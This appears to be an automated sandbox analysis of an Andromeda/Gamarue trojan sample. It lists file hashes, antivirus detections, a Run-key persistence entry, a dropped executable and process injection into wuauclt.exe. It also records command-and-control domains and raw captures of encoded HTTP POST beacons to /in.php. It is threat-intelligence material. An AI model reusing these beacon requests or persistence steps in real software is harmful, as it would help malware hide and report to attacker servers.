Analysis Date2015-03-15 12:47:26
MD51b227f86f8b28303a181367124aecd02
SHA1941a3c7747e7e85806e508fedb1572c4fb5ee622

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: a9294eaa84de4d3d194cf55f16bb5d6d sha1: f15360803944ee4198f59bc859d3bc8cca20ea5d size: 7680
Section.rdata md5: 62f6a242d40de85d4211f98cb6059fae sha1: 87fd2c90d445df077109e7aae958fdb140392fa0 size: 512
Section.data md5: 270333eb361884b49d7773b18aa79988 sha1: a1d993ca88684b6acbddcd6bc5a610637a969c96 size: 512
Section.rsrc md5: 687a936f4ec298407bb87376bd821098 sha1: cabfffedb16131c955c989073d0f900954c2672b size: 173056
Timestamp2003-05-25 17:04:53
VersionLegalCopyright: Copyright Mamuze© 2013
InternalName: Travka
FileVersion: 1, 3, 4, 7
CompanyName: House
PrivateBuild: Rainbow
LegalTrademarks: Fioka©"
Comments: Praslin
ProductName: Sunce
SpecialBuild: Kotlina
ProductVersion: 3, 0, 0, 0
FileDescription: Marko
OriginalFilename: Voda.exe
PackerBorland Delphi 3.0 (???)
PEhash763958cdd6e6a0c1ac8a810840bfc92bdec641bc
IMPhash6d224858fdb04f5c605bc4a4a74b60cc
AV360 Safeno_virus
AVAd-AwareTrojan.GenericKDZ.13938
AVAlwil (avast)Downloader-SYZ [Trj]
AVArcabit (arcavir)Trojan.GenericKDZ.13938
AVAuthentiumW32/Trojan.FFMJ-0154
AVAvira (antivir)BDS/Androm.EB.100
AVBullGuardTrojan.GenericKDZ.13938
AVCA (E-Trust Ino)Win32/Gamarue.JK
AVCAT (quickheal)Worm.Gamarue.B
AVClamAVno_virus
AVDr. WebBackDoor.Andromeda.22
AVEmsisoftTrojan.GenericKDZ.13938
AVEset (nod32)Win32/TrojanDownloader.Wauchos.A
AVFortinetW32/Injector.AFHI!tr
AVFrisk (f-prot)W32/Trojan2.OCAH
AVF-SecureTrojan.GenericKDZ.13938
AVGrisoft (avg)Downloader.Generic13.AOZD
AVIkarusWorm.Win32.Gamarue
AVK7Trojan-Downloader ( 0040f30c1 )
AVKaspersky 2015Trojan.Win32.Generic
AVMalwareBytesTrojan.Zbot.HE
AVMcafeePWS-FAVD!1B227F86F8B2
AVMicrosoft Security EssentialsVirTool:Win32/Obfuscator.AGC
AVMicroWorld (escan)Trojan.GenericKDZ.13938
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend MicroTROJ_FORUCON.BMC
AVVirusBlokAda (vba32)SScope.Malware-Cryptor.Wauchos.2183

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\system32\wuauclt.exe

Process
↳ C:\WINDOWS\system32\wuauclt.exe

RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝
C:\Documents and Settings\All Users\Local Settings\Temp\msawoiifp.exe\\x00
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\All Users\Local Settings\Temp\msawoiifp.exe
Creates File\Device\Afd\Endpoint
Deletes FileC:\941A3C~1.EXE
Creates Mutex3227095050

Network Details:

DNSwww.update.microsoft.com.nsatc.net
Type: A
134.170.58.221
DNSwww.update.microsoft.com.nsatc.net
Type: A
134.170.58.222
DNSxdqzpbcgrvkj.ru
Type: A
195.22.26.254
DNSxdqzpbcgrvkj.ru
Type: A
195.22.26.231
DNSxdqzpbcgrvkj.ru
Type: A
195.22.26.252
DNSxdqzpbcgrvkj.ru
Type: A
195.22.26.253
DNSanam0rph.su
Type: A
195.22.26.254
DNSanam0rph.su
Type: A
195.22.26.231
DNSanam0rph.su
Type: A
195.22.26.252
DNSanam0rph.su
Type: A
195.22.26.253
DNSorzdwjtvmein.in
Type: A
50.63.202.67
DNSygiudewsqhct.in
Type: A
69.195.129.70
DNSsomicrososoft.ru
Type: A
64.90.187.138
DNSwww.update.microsoft.com
Type: A
DNSbdcrqgonzmwuehky.nl
Type: A
HTTP POSThttp://xdqzpbcgrvkj.ru/in.php
User-Agent: Mozilla/4.0
HTTP POSThttp://anam0rph.su/in.php
User-Agent: Mozilla/4.0
HTTP POSThttp://orzdwjtvmein.in/in.php
User-Agent: Mozilla/4.0
HTTP POSThttp://ygiudewsqhct.in/in.php
User-Agent: Mozilla/4.0
HTTP POSThttp://somicrososoft.ru/in.php
User-Agent: Mozilla/4.0
Flows TCP192.168.1.1:1031 ➝ 134.170.58.221:80
Flows UDP192.168.1.1:1032 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1033 ➝ 195.22.26.254:80
Flows UDP192.168.1.1:1034 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1035 ➝ 195.22.26.254:80
Flows UDP192.168.1.1:1036 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1037 ➝ 50.63.202.67:80
Flows UDP192.168.1.1:1038 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1039 ➝ 69.195.129.70:80
Flows UDP192.168.1.1:1040 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1041 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1042 ➝ 64.90.187.138:80

Raw Pcap
0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20786471   P/1.1..Host: xdq
0x00000020 (00032)   7a706263 6772766b 6a2e7275 0d0a5573   zpbcgrvkj.ru..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 55745949   3qIy7Q6bpTfDUtYI
0x000000e0 (00224)   66745a33 334e4241 4f4c4173 67396d59   ftZ33NBAOLAsg9mY
0x000000f0 (00240)   3371773d 3d                           3qw==

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20616e61   P/1.1..Host: ana
0x00000020 (00032)   6d307270 682e7375 0d0a5573 65722d41   m0rph.su..User-A
0x00000030 (00048)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000040 (00064)   300d0a43 6f6e7465 6e742d54 7970653a   0..Content-Type:
0x00000050 (00080)   20617070 6c696361 74696f6e 2f782d77    application/x-w
0x00000060 (00096)   77772d66 6f726d2d 75726c65 6e636f64   ww-form-urlencod
0x00000070 (00112)   65640d0a 436f6e74 656e742d 4c656e67   ed..Content-Leng
0x00000080 (00128)   74683a20 38340d0a 436f6e6e 65637469   th: 84..Connecti
0x00000090 (00144)   6f6e3a20 636c6f73 650d0a0d 0a757071   on: close....upq
0x000000a0 (00160)   63684373 38764654 4b464f56 6d6e494b   chCs8vFTKFOVmnIK
0x000000b0 (00176)   47497769 4c72486f 33567436 38543379   GIwiLrHo3Vt68T3y
0x000000c0 (00192)   71766851 75325471 6574516e 33714979   qvhQu2TqetQn3qIy
0x000000d0 (00208)   37513662 70546644 55745949 66745a33   7Q6bpTfDUtYIftZ3
0x000000e0 (00224)   334e4241 4f4c4173 67396d59 3371773d   3NBAOLAsg9mY3qw=
0x000000f0 (00240)   3d71773d 3d                           =qw==

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 206f727a   P/1.1..Host: orz
0x00000020 (00032)   64776a74 766d6569 6e2e696e 0d0a5573   dwjtvmein.in..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 55745949   3qIy7Q6bpTfDUtYI
0x000000e0 (00224)   66745a33 334e4241 4f4c4173 67396d59   ftZ33NBAOLAsg9mY
0x000000f0 (00240)   3371773d 3d                           3qw==

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20796769   P/1.1..Host: ygi
0x00000020 (00032)   75646577 73716863 742e696e 0d0a5573   udewsqhct.in..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 55745949   3qIy7Q6bpTfDUtYI
0x000000e0 (00224)   66745a33 334e4241 4f4c4173 67396d59   ftZ33NBAOLAsg9mY
0x000000f0 (00240)   3371773d 3d                           3qw==

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20736f6d   P/1.1..Host: som
0x00000020 (00032)   6963726f 736f736f 66742e72 750d0a55   icrososoft.ru..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038340d 0a436f6e   -Length: 84..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 73387646 544b464f   ..upqchCs8vFTKFO
0x000000b0 (00176)   566d6e49 4b474977 694c7248 6f335674   VmnIKGIwiLrHo3Vt
0x000000c0 (00192)   36385433 79717668 51753254 71657451   68T3yqvhQu2TqetQ
0x000000d0 (00208)   6e337149 79375136 62705466 44557459   n3qIy7Q6bpTfDUtY
0x000000e0 (00224)   4966745a 33334e42 414f4c41 7367396d   IftZ33NBAOLAsg9m
0x000000f0 (00240)   59337177 3d3d                         Y3qw==


Strings
<.
040904b0
1, 3, 4, 7
 2013
3, 0, 0, 0
Comments
CompanyName
Copyright Mamuze
FileDescription
FileVersion
Fioka
House
InternalName
Kotlina
LegalCopyright
LegalTrademarks
Marko
OriginalFilename
Praslin
PrivateBuild
ProductName
ProductVersion
Rainbow
SpecialBuild
StringFileInfo
Sunce
Translation
Travka
VarFileInfo
Voda.exe
VS_VERSION_INFO
5XuL^k
##8vR^
AcJ@`GDaIG^GK\HS]J[OCaPDVD7=)
ADVAPI32.dll
<AS8<.=?6+
atpsUx{t
B/!bRGeUJeUJeUJeUJcSH\PGWMFULFSNKPONLNOIMPFOUCPZ?P\8M\CW`qnZ
bx}v{t^qytr
C0#eVKiZOhYOhYOhYO_SK<]t.`
C1$hYOl]Sk]Sk]Sk\R\TO/j
C4.M?9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9F810 
CloseHandle
CreateThread
`cWiZQk]Sk]Sl]TeVLD2%/
D1&k\SoaWo`Wo`Wn_V\VS0k
D3'naXse\re\re\rd[]YW0p
@.data
Da)Ym4qs9
d}wp}s{tsT
E4)rd\viaviaviatg_][[0t
*&^ebQ"
Eb*Zp7yz>
eg\m^Uo`Wo`Wo`WoaXiZPA/"-
>]&?e+I
f#3b1C
FindResourceA
GetCurrentDirectoryA
GetCurrentProcessId
GetModuleHandleA
GetProcAddress
GetSystemInfo
gkwUg!X}
GlobalFree
GNy8=[+)H$
}HB7OA7PC8NA6E4&8"
,Hj8J-
_hzYm%\
I2 J4!J4!J4!J4!J3!J3!J3!J3!J3!J3!G1 Q9
}icYqd[re\re\re\re\sf]eVM9&
i#R 7X!>
(,I}y(yIc
j>j.jA
jL'JRz
jnpmhewkdymfxleyle{og|pi|qi|pi|pi|pi|pi|pi|pi|pi|pi|pi|pi|pi}qixldF6,G7-{pi
jWj%jQ
K5	C}.[
K=6wmh
kernel32.dll
KERNEL32.dll
_`\`k]mymmpgjg^kb[oc]tg`vjcwkdxldxleylexlexlexlexlexleymeth`F5+F6,xld}qi|pi|pi|og_ab4|
\K>_NA_M@_M@_M@_M@_N@_N@_N@_NA_NA_NA_N@_M@_M@_NAYI=dO5
 l}4R<Y
L6%M7&M7&M7&M7&M7&M7&M7&M7&M7&M7&J5$U>"
lgciinf
LoadLibraryA
LoadResource
lpsnkjrkgvkezng}rk
M5(3XMA
_NBbQEbQEbQEbQEbQEbQEaQDaPDaPCaOC`OB`OB_NA_NA^NAXI>gP4
nxmhi`ic[kaYnbZsf_uhaviaviaviaviaviard\E4)F5+th`ymexleylewkc\]^0x
O9)P;+P;+P;+P;+P;+P;+P;+P;+P;+P;*L8)X@%
	oC-nr
OH;WG;YI<ZH<[I=]K?\K=M:,8#
oopuol|rn
ov{qopslixni~sl
`P8]Cy
p{P{{~rT
[~psat
[~ps[xq
\^QgWMhYOiZPcSID1$0
QH:ZH;[I<\I<\I<TA3B-
{qlPB<,
Q=,S>.S>.S>.S>.S>.S>.S>.S>.S>.S>.O<-\D)
QVWj!j+j
QZ9':}
`.rdata
RegCloseKey
/RFEQPP
Rich[z
{RprwtT}
r;Ulz_1
RYwPc&\
SizeofResource
so.zX/
s{{=s{{
s~z3WlRz
T@1VB3VB3VB3VB3VB3VB3VB3VB3VB3VB3T@2VB.iO.kQ-zb3~h5
~{tBA=s{{
}t{BA=s{{
{tBAUx
tc~fxstRwp
tc~~{wt{
!This program cannot be run in DOS mode.
tmH8/G7.
tmjge?
tpsR~}
trxp{U~{st
{tUx{t]p|tfPA471PcdMIZyiGxmPA0PADO
tWp}s{t
{tWp}s{tP
un{piG7-H9/
Ux}sat
V#9[#@
V9fodm=
vQ/%.$
V{~qp{P{{~r
V{~qp{U
WaitForSingleObject
WD5YF8YF8YF8YF8YF8YF8YF8YF8YF8YF8XF8VD7TB5SB4RA4M=1[F-
wqD4+-
wrI91=-$~sm
wt{{BA=s{{
wT^e7$+3o
X$;^&C
(X Gg/fv=
x~}Ux{
}yj9jRj
ysyojS|
ytirxv
YYKdSHeUJ^NBC/!1
*Z&=a)F
ZH:\J=\J=\J=\J=\J=\J=\J=\J=\J=\J=\J=\J=\J=\J=\J=WF:aL3
Z_z@R:1U.@d$b